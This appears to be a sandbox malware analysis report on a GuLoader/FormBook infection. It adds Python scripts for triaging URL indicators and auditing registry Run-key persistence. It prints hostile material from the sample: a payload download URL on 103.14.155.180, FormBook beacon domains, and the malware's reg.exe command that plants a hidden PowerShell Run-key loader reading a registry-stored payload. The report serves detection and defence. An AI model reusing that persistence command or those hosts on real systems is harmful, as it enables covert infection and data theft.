        Source: cmd.exe, 0000000C.00000002.2886759611.00000000029F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
        Source: cmd.exe, 0000000C.00000003.2329977830.0000000007C29000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
        Source: powershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
        Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
        Source: C:\Users\user\Desktop\160420241245287.exe | Code function: 0_2_004052D3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D3
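        Most of the URLs in the string list above are not indicators: the nuget.org, contoso.com, Pester and apache.org strings are what PowerShell's own module manifests leave in powershell.exe memory, and the Ecosia, DuckDuckGo, Yahoo and login.live.com URLs sit in cmd.exe memory because the injected stealer reads browser profile data. What is left is the .bin download on 103.14.155.180 in the memory of the dropped Untapestried.exe (GuLoader normally fetches its encrypted second stage as a .bin file; this section shows no response from that host), and the path /9pdo/ that recurs on n-benriya002.com and www.eternalsunrise.xyz, and again in the Apache "The requested URL /9pdo/ was not found" body above. The four spellings of the .bin URL (.bin, .bin., .bin3c, .binO) are one string; the trailing bytes are neighbouring memory the string scanner read past the terminator, as is NTIFIER=Intel64. The Python below is an added example, not part of the report: it parses these lines, collapses the overruns, separates noise hosts from indicators using an allowlist that is the author's own assumption, and surfaces paths shared across hosts, the thing to pivot on for a FormBook build, whose URI path is fixed while the host rotates through a list that is mostly decoys.

```python
import re
from collections import defaultdict
from typing import Dict, List
from urllib.parse import urlsplit

# A subset of the report's "String found in binary or memory" lines, copied as
# they appear (with a separator added between the source and the finding).
REPORT_LINES = [
    "Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://103.14.155.180/",
    "Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://103.14.155.180/CkkRLCTUxW193.bin",
    "Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://103.14.155.180/CkkRLCTUxW193.bin.",
    "Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://103.14.155.180/CkkRLCTUxW193.bin3c",
    "Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://103.14.155.180/CkkRLCTUxW193.binO",
    "Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://103.14.155.180/NTIFIER=Intel64",
    "Source: cmd.exe, 0000000C.00000002.2889167441.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000002.2888724701.00000000036B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://n-benriya002.com/9pdo/?edR0hF=REEnkW6M",
    "Source: bvvgQqxLmFZr.exe, 0000000D.00000002.2887373536.000000000115C000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.eternalsunrise.xyz/9pdo/",
    "Source: powershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe",
    "Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=",
]

# Tolerates both "...sdmpString found" and "...sdmp | String found".
LINE_RE = re.compile(r"^Source: (?P<src>.*?)\s*\|?\s*String found in binary or memory: (?P<url>\S+)$")

# Analyst allowlist, an assumption rather than something the report states: hosts
# that PowerShell's own module manifests leave in powershell.exe memory, and
# browser search-engine/account URLs that end up in cmd.exe memory because the
# injected stealer reads browser profiles.
NOISE_HOSTS = {
    "nuget.org", "contoso.com", "pesterbdd.com", "github.com", "www.apache.org",
    "aka.ms", "schemas.xmlsoap.org", "nsis.sf.net", "www.w3c.org",
    "ac.ecosia.org", "cdn.ecosia.org", "www.ecosia.org", "duckduckgo.com",
    "ch.search.yahoo.com", "login.live.com", "inference.location.live.net",
}

# Up to three trailing bytes after a payload extension are neighbouring memory the
# string scanner read past the terminator (the report lists .bin, .bin., .bin3c, .binO).
OVERRUN_RE = re.compile(r"^(.*\.(?:bin|exe|dll|ps1|vbs|zip))[^/?&=]{0,3}$")


def normalize(url: str) -> str:
    m = OVERRUN_RE.match(url)
    return m.group(1) if m else url


def parse(lines: List[str]) -> List[dict]:
    records = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        procs = {p.strip() for p in m["src"].split(",") if p.strip().endswith(".exe")}
        records.append({"procs": procs, "url": normalize(m["url"])})
    return records


def triage(lines: List[str]) -> Dict[str, dict]:
    """Group findings by host, record which processes held them, flag known noise."""
    by_host: Dict[str, dict] = defaultdict(lambda: {"urls": set(), "procs": set(), "noise": False})
    for r in parse(lines):
        host = urlsplit(r["url"]).hostname
        entry = by_host[host]
        entry["urls"].add(r["url"])
        entry["procs"].update(r["procs"])
        entry["noise"] = host in NOISE_HOSTS
    return dict(by_host)


def shared_paths(lines: List[str]) -> Dict[str, set]:
    """Paths seen on more than one host: the stable part of a FormBook beacon."""
    hosts = defaultdict(set)
    for r in parse(lines):
        parts = urlsplit(r["url"])
        if parts.path not in ("", "/"):
            hosts[parts.path].add(parts.hostname)
    return {path: h for path, h in hosts.items() if len(h) > 1}


if __name__ == "__main__":
    for host, e in triage(REPORT_LINES).items():
        tag = "noise" if e["noise"] else "IOC"
        print(f"{tag:5} {host:25} procs={sorted(e['procs'])} urls={sorted(e['urls'])}")
    print("shared paths:", shared_paths(REPORT_LINES))
```

        Run over the full list above, the same triage keeps the query-parameter name edR0hF and the path /9pdo/ as the durable indicators and treats each individual host as weak evidence on its own.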

        E-Banking Fraud

        Source: Yara match | File source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Untapestried.exe
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03144340 NtSetContextThread,LdrInitializeThunk,12_2_03144340
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03144650 NtSuspendThread,LdrInitializeThunk,12_2_03144650
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142B60 NtClose,LdrInitializeThunk,12_2_03142B60
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142AD0 NtReadFile,LdrInitializeThunk,12_2_03142AD0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142AF0 NtWriteFile,LdrInitializeThunk,12_2_03142AF0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142F30 NtCreateSection,LdrInitializeThunk,12_2_03142F30
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142FB0 NtResumeThread,LdrInitializeThunk,12_2_03142FB0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142FE0 NtCreateFile,LdrInitializeThunk,12_2_03142FE0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142EE0 NtQueueApcThread,LdrInitializeThunk,12_2_03142EE0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142D10 NtMapViewOfSection,LdrInitializeThunk,12_2_03142D10
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_03142D30
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142DD0 NtDelayExecution,LdrInitializeThunk,12_2_03142DD0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_03142DF0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_03142C70
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142C60 NtCreateKey,LdrInitializeThunk,12_2_03142C60
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_03142CA0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031435C0 NtCreateMutant,LdrInitializeThunk,12_2_031435C0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031439B0 NtGetContextThread,LdrInitializeThunk,12_2_031439B0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142B80 NtQueryInformationFile,12_2_03142B80
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142BA0 NtEnumerateValueKey,12_2_03142BA0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142BF0 NtAllocateVirtualMemory,12_2_03142BF0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142BE0 NtQueryValueKey,12_2_03142BE0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142AB0 NtWaitForSingleObject,12_2_03142AB0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142F60 NtCreateProcessEx,12_2_03142F60
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142F90 NtProtectVirtualMemory,12_2_03142F90
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142FA0 NtQuerySection,12_2_03142FA0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142E30 NtWriteVirtualMemory,12_2_03142E30
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142E80 NtReadVirtualMemory,12_2_03142E80
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142EA0 NtAdjustPrivilegesToken,12_2_03142EA0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142D00 NtSetInformationFile,12_2_03142D00
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142DB0 NtEnumerateKey,12_2_03142DB0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142C00 NtQueryInformationProcess,12_2_03142C00
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142CC0 NtQueryVirtualMemory,12_2_03142CC0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142CF0 NtOpenProcess,12_2_03142CF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03143010 NtOpenDirectoryObject,12_2_03143010
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03143090 NtSetValueKey,12_2_03143090
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03143D10 NtOpenProcessToken,12_2_03143D10
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03143D70 NtOpenThread,12_2_03143D70
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_02857730 NtCreateFile,12_2_02857730
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_02857A10 NtClose,12_2_02857A10
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_02857890 NtReadFile,12_2_02857890
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_02857970 NtDeleteFile,12_2_02857970
        Source: C:\Users\user\Desktop\160420241245287.exe | Code function: 0_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess
        Source: C:\Users\user\Desktop\160420241245287.exe | Code function: 0_2_00404B10
        Source: C:\Users\user\Desktop\160420241245287.exe | Code function: 0_2_0040653F
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04BDF108
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04BDF9D8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04BDEDC0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031CA352
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0311E3F0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031D03E6
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031B0274
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031902C0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031AA118
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03100100
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03198158
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031D01AA
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031C41A2
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031C81CC
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031A2000
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03134750
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03110770
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0310C7C0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0312C6E0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03110535
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031D0591
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031B4420
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031C2446
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031BE4F6
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031CAB40
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031C6BD7
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0310EA80
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03126962
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031DA9A6
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0311A840
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03112840
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030F68B8
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0313E8F0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03130F30
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031B2F30
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03152F28
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03184F40
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0318EFA0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03102FC8
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031CEE26
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03110E59
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03122E90
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031CCE93
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031CEEDB
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031ACD1F
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0311AD00
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03128DBF
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0310ADE0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03110C00
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031B0CB5
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03100CF2
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031C132D
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030FD34C
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0315739A
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031152A0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0312B2C0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0312D2F0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031B12ED
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031DB16B
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0314516C
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030FF172
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0311B1B0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031170C0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031BF0CC
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031C70E9
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031CF0E0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031CF7B0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03155630
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031C16CC
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031C7571
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031AD5B0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031D95C3
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031CF43F
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03101460
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031CFB76
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0312FB80
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03185BF0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0314DBF9
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031CFA49
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031C7A46
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03183A6C
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03155AA0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031ADAAC
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031B1AA3
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031BDAC6
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031A5910
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03119950
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0312B950
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0317D800
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031138E0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031CFF09
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03111F92
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031CFFB1
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030D3FD5
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030D3FD2
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03119EB0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031C1D5A
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03113D40
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031C7D73
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0312FDC0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03189C32
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031CFCF2
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_02841370
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0283A7B0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0283C730
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0283C510
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_02842EAC
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_02842EB0
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_02859E80
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 0318F290 appears 103 times
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 03157E54 appears 107 times
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 030FB970 appears 262 times
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 03145130 appears 58 times
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 0317EA12 appears 86 times
        Source: 160420241245287.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"
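The Run value written by the reg.exe command above is typed REG_EXPAND_SZ and starts with %Divergente%, so the program that actually runs at logon is decided by an environment variable and is not visible in the value itself; the value then pulls its real payload out of another registry key (HKCU:\Ciconiform\, value Syskerne) and hands it back to the same interpreter. The report does not show where %Divergente% is defined or what it expands to. The audit below is an added example written for this page, not Joe Sandbox code and not part of the sample: it expands each Run value against a supplied environment, flags variables that resolve to a script host or cannot be resolved at all, and then applies content rules to the expanded string. The assumed expansion of %Divergente% to powershell.exe, the benign OneDrive entry and the live-registry reader are constructed for illustration.

```python
import re

# Script hosts and LOLBins that a Run value should not reach through an env var.
INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe")
ENV_REF = re.compile(r"%([^%\s]+)%")
CONTENT_RULES = [
    # The payload is fetched from another registry value at run time.
    ("registry_stored_payload", re.compile(r"Get-ItemProperty|HKCU:|HKLM:|Registry::", re.I)),
    # Text is turned into code: iex / Invoke-Expression / dot-invoking a variable.
    ("dynamic_invocation", re.compile(r"\biex\b|Invoke-Expression|\.\s*\$\w+\s*\(", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+(?:hidden|minimized)", re.I)),
    ("encoded_command", re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
]


def expand(data: str, env: dict) -> str:
    """Expand %VAR% references case-insensitively; unknown variables are left as written."""
    env_ci = {k.lower(): v for k, v in env.items()}
    return ENV_REF.sub(lambda m: env_ci.get(m.group(1).lower(), m.group(0)), data)


def audit_entry(name: str, reg_type: str, data: str, env: dict) -> list:
    """Findings for one Run value. REG_SZ and REG_EXPAND_SZ are both expanded here so the
    verdict does not depend on how the shell treats each type."""
    env_ci = {k.lower(): v for k, v in env.items()}
    findings = []
    for var in dict.fromkeys(ENV_REF.findall(data)):          # unique, in order of appearance
        target = env_ci.get(var.lower())
        if target is None:
            findings.append(f"env_var_unresolved:{var}")       # defined elsewhere, or not for this session
        elif target.strip('"').lower().endswith(INTERPRETERS):
            findings.append(f"env_var_expands_to_interpreter:{var}")
    expanded = expand(data, env)
    for label, rule in CONTENT_RULES:
        if rule.search(expanded):
            findings.append(label)
    return findings


def audit_run_entries(entries, env: dict) -> dict:
    """entries: iterable of (name, reg_type, data). Returns {name: findings} for suspicious values."""
    report = {}
    for name, reg_type, data in entries:
        findings = audit_entry(name, reg_type, data, env)
        if findings:
            report[name] = findings
    return report


def read_live_run_entries():
    """Windows only: HKCU Run values as (name, REG_* type name, data)."""
    import winreg
    type_names = {winreg.REG_SZ: "REG_SZ", winreg.REG_EXPAND_SZ: "REG_EXPAND_SZ"}
    entries = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                        r"Software\Microsoft\Windows\CurrentVersion\Run") as key:
        index = 0
        while True:
            try:
                name, data, reg_type = winreg.EnumValue(key, index)
            except OSError:
                break
            entries.append((name, type_names.get(reg_type, str(reg_type)), str(data)))
            index += 1
    return entries


# First entry: the value written by the REG ADD command in the report. Second entry: a
# constructed benign neighbour. What %Divergente% really expands to is not in the report;
# the expansion to powershell.exe below is an assumption used only to exercise the rules.
RUN_ENTRIES = [
    ("Lgplante", "REG_EXPAND_SZ",
     r"%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"),
    ("OneDrive", "REG_SZ", r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]
ASSUMED_ENV = {"Divergente": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"}


if __name__ == "__main__":
    for name, findings in audit_run_entries(RUN_ENTRIES, ASSUMED_ENV).items():
        print(name, "->", ", ".join(findings))
```

On a live host, pass the output of read_live_run_entries() together with the user's environment (HKCU\Environment merged over the system environment) as `env`; an env var that the audit cannot resolve is itself worth a look, because the logon shell may still resolve it from a source the audit did not read.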
        Source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
